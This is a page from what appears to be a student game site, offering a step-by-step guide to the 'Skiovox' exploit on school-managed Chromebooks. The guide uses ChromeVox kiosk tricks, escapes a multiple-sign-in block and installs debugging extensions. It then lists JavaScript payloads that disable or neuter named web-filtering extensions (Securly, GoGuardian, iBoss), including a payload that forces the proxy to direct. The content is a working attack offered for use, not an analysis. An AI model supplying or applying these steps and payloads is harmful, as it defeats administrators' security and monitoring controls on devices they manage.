Home Games Kajigs

Skiovox
I (Amukerd) Will Keep This Updated As It Is An Amazing Exploit

INSTRUCTIONS: https://skiovox.com/skiovox.pdf, https://skiovox.netlify.app/skiovox.pdf, https://skiovox.pages.dev/skiovox.pdf, OR DOWNLOAD THE PDF HERE
I advise you to open the pdf on a different device, as you will not be able to look at it using your Chromebook because you have to sign out to do this exploit
This is a really neat exploit; maybe the best enrolled exploit ever found. It allows you to open an unblocked browser on any device on any recent version, and it's a big pain for admins to block. The core part of the exploit was found by @akabutnice and @bypassi expanded it.
Testing and advice was given by another group of awesome people.
Feel free to clone the slides and github release and host them yourself. Happy browsing!

Skiovox Breakout
(Get permanent code execution in school blocking extensions using Skiovox)
Do the main pdf guide first before going onto this, so you know more about what you are doing.

This extension helps you get permanent code execution in mv2/mv3 extensions in your school profile. That means you can execute code in these extensions, even when logged in normally, without skiovox.
Initial PoC was made by @unretained. @akabutnice improved it, tested it and fixed issues with it. While this looks barebones, we will add updates to fix and improvements upon this project.

2A Or 2B/2C Indentification

After you turn off your wifi and enter the kiosk app you need to identify if you are a 2a or 2b/2c user. To do this, just check if you have a back button in the top left corner of the no internet screen. If you are a 2a user, just do the normal steps from the guide, if you are a 2b/2c user, then do the steps below.
Open Chromevox using the shortcut ctrl-alt-z
Wait a few seconds for Chromevox to load and do the shortcut search-O-T (search is the magnifying glass on your keyboard)
This will take you to a ChromeVox tutorial page. Click the final one of the boxes, named 'Resources'
From there, click the blue link titled 'ChromeVox Command Reference'
Now on the left side of the screen press 'Sign in as an additional user' - if you cannot do this, and you are not a 2a user, then you cannot do the extension breakout.
Sign in as you would, with your email and password. If your school uses other forms of login, like OneLogin, just forget it. All you need is your email and password.
From there, you might get a popup that reads like this: " An administrator has disallowed multiple sign-in for youremail@emaildomain.com. All users must sign out to continue". Just press Escape to bypass this.

Usage instructions

1. Extract this extension, and the Skiovox one from above and install them to chrome://extensions as an unpacked extension.
2. Open a new tab to the custom Skiovox one and click on the extension in the toolbar (you might have to click the puzzle piece icon to see it), and type in the first 5 letters of your blocker ext id. Remove the text alert(1); from the second box. Press Start injection. If its done right, a popup just below the url bar will say "Skiovox Breakout has started debugging this browser.
3. Now, go to your school window, and go to chrome://extensions. Find the chrome extension you want to disable on the list, and click on the details button. If there is a switch on there, spam it. If there isnt, you can just open a page inside the extension, for example, chrome-extension://Your Extension Id Here/_generated_background_page.html, and spam refresh.
4. After enough times, a popup should show up with the following alert:

*Extension Name*

Save this in your bookmarks: filesystem://chrome-extension://extensionid/temporary/shim.html

As it says, save this in your school bookmarks then reboot, and login into your school account with your wifi on.
5. Right click the bookmark, and select Open in new tab, or copy the link, place it in the url bar, and press alt-shift-enter, then type in your payload.
There it it. You have a input box where you can upload any javascript for it to be evaluated. More javascript to come, but I recommend the universal payload if you want to simply disable any extension.

Common complaints

Q: I dont see a chromevox popup, whats happening?
A: That app doesnt support chromevox, use another app.
Q: How do I do anything when i dont have internet?
A: If you're speaking of steps 1 to 5, you dont need it.
Q: I dont see the 'sign into another account' button.
A: You either need to restart the chromebook, or just make sure to turn off internet BEFORE going into the kiosk app.
It also might be possible that this doesn't work on versions 118 or 119
Links to both extension githubs:

https://github.com/bypassiwastaken/skiovox-helper

https://github.com/MunyDev/skiovox-breakout

Payloads

Universal:

chrome.runtime.getBackgroundPage(function (p) {
    p.chrome.management.setEnabled("Your Specific Extension Id Here", false);
});
Replace 'Your Specific Extension Id Here', With the Id of your blocking extension (keep the quotes around the id)

This is a one-time use though as you cannot turn the blocking extension back on if you use this specific payload
Securly:

localStorage.cluster = "AVOID_OS, " + (Date.now() * (Math.random()))
Goguardian:

chrome.runtime.getBackgroundPage(function (page) {
    page.alert(page.chrome.tabs.captureVisibleTabAsync = function () {})
})
or

for (let i = 0; i < localStorage.length; i++) {
    localStorage[localStorage.key(i)] = "-"
}
chrome.extension.getBackgroundPage().location.reload()
Either One Works
Iboss:

var config = {
    mode: "direct"
};
var intervalId = setInterval(function () {
    chrome.proxy.settings.set(
        {value: config, scope: 'regular'},
        function(x) {}
    );
})
onload = function (ev) {
    var btnElement = document.createElement('button');
    btnElement.onclick = function (ev) {
        clearInterval(intervalId)
    }
    btnElement.innerHTML = 'hi';
    document.body.appendChild(btnElement);
}
(This makes proxy direct)